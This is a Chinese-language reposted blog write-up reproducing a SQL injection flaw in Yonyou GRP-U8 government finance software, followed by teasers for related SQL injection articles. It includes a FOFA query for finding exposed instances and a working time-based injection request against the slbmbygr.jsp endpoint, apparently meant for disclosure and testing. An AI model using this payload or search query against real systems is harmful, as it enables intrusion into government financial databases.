用友GRP-U8 SQL注入漏洞复现

7月前作者：OidBoy_G 分类：Toy博客阅读(34) 违法举报

这篇具有很好参考价值的文章主要介绍了用友GRP-U8 SQL注入漏洞复现。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

0x01 产品简介

用友GRP-U8R10行政事业财务管理软件是用友公司专注于国家电子政务事业，基于云计算技术所推出的新一代产品，是我国行政事业财务领域最专业的政府财务管理软件。

0x02 漏洞概述

用友GRP-U8的bx_historyDataCheck jsp、slbmbygr.jsp等接口存在SQL注入漏洞，由于用友GRP-U8未对用户的输入进行有效的过滤，直接将其拼接进了SQL查询语句中，导致系统出现SQL注入漏洞，进一步利用可造成主机失陷。

0x03 影响范围

用友GRP-U8R10 U8Manager B、C、G 系列产品 < 20230905

0x04 复现环境

FOFA：app="用友-GRP-U8"

用友GRP-U8 SQL注入漏洞复现,漏洞复现,安全,web安全,网络安全

0x05 漏洞复现

PoC-1

GET /u8qx/slbmbygr.jsp?gsdm=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: your-ip

延时5秒

用友GRP-U8 SQL注入漏洞复现,漏洞复现,安全,web安全,网络安全

Sqlmap验证文章来源地址https://www.toymoban.com/news/detail-723828.html

到了这里，关于用友GRP-U8 SQL注入漏洞复现的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：如若内容造成侵权/违法违规/事实不符，请点击违法举报进行投诉反馈，一经查实，立即删除！

分享到：

领支付宝红包赞助服务器费用

【网络安全】初探SQL注入漏洞

要想玩SQL注入，一个简单的数据交互页面是需要的，故我们用PHP做一个简易网页，有登录、注册和首页三块内容。登录需要输入账号密码，等待提交后进入系统；注册需要输入名字，密码，手机号，照片，等待提交后进入系统；首页需要利用PHP和数据库联动后的查询语句，

2024年02月16日
浏览(32)
【网络安全】「漏洞原理」（二）SQL 注入漏洞之理论讲解

严正声明：本博文所讨论的技术仅用于研究学习，旨在增强读者的信息安全意识，提高信息安全防护技能，严禁用于非法活动。任何个人、团体、组织不得用于非法目的，违法犯罪必将受到法律的严厉制裁。【点击此处即可获取282G网络安全零基础入门学习资源】信息搜集在

2024年02月06日
浏览(39)
【网络安全】「漏洞原理」（一）SQL 注入漏洞之概念介绍

严正声明：本博文所讨论的技术仅用于研究学习，旨在增强读者的信息安全意识，提高信息安全防护技能，严禁用于非法活动。任何个人、团体、组织不得用于非法目的，违法犯罪必将受到法律的严厉制裁。 SQL 注入（SQL Injection）是一种常见的网络攻击技术，它利用应用程序

2024年02月06日
浏览(36)
金山终端安全系统V9.0 SQL注入漏洞复现

金山终端安全系统是一款为企业提供终端防护的安全产品，针对恶意软件、病毒和外部攻击提供防范措施，帮助维护企业数据和网络。金山终端安全系统V9.0 /inter/update_software_info_v2.php页面存在sql注入漏洞，该漏洞是由于金山终端安全系统未对用户的输入进行有效的

2024年02月08日
浏览(28)
【网络安全】SQL注入漏洞的修复建议

SQL注入是Web应用程序常见的安全漏洞之一，攻击者通过恶意构造的SQL查询语句，成功在应用程序的数据库中执行任意操作，导致数据泄露、篡改或其他安全问题。本篇技术博客将详细介绍SQL注入漏洞的修复建议，包括过滤危险字符和使用预编译语句，通过具体的代码案例帮助

2024年02月06日
浏览(40)
亿赛通电子文档安全管理系统 SQL注入漏洞复现

亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加

2024年02月03日
浏览(30)
网络安全：Kali Linux 进行SQL注入与XSS漏洞利用

目录一、实验 1.环境 2.Kali Linux 进行SQL注入 3.Kali Linux 进行XSS漏洞利用二、问题 1.XSS分类 2.如何修改beef-xss的密码 3.beef-xss 服务如何管理 4.运行beef报错 5.beef 命令的颜色有哪些区别 6.owasp-top-10 有哪些变化（1）主机表1 主机系统版本 IP 备注 Kali Linux 2022.4 192.168.204.154（动态

2024年04月26日
浏览(30)
Web安全：SQL注入漏洞测试.

SQL注入就是有些恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中，同时程序的本身对用户输入的内容过于相信，没有对用户插入的SQL语句进行任何的过滤，从而直接被SQL语句直接被服务端执行，导致数据库的原有信息泄露，篡改，甚至被删除等风险。 SQL注

2024年02月05日
浏览(41)
Web安全：SQL注入漏洞测试（防止黑客利用此漏洞.）

SQL注入就是有些恶意用户在提交查询请求的过程中将SQL语句插入到请求内容中，同时程序的本身对用户输入的内容过于相信，没有对用户插入的SQL语句进行任何的过滤，从而直接被SQL语句直接被服务端执行，导致数据库的原有信息泄露，篡改，甚至被删除等风险。 SQL注

2024年02月13日
浏览(28)
web安全漏洞-SQL注入攻击实验

实验目的学习sql显注的漏洞判断原理掌握sqlmap工具的使用分析SQL注入漏洞的成因实验工具 sqlmap是用python写的开源的测试框架，支持MySQL，Oracle，PostgreSQL，Microsoft SQL Server，Microsoft Access，IBM DB2，SQLite，Firebird，Sybase，SAP，MAXDB并支持6种SQL注入手段。实验内容 SQL注入（SQL I

2024年02月06日
浏览(39)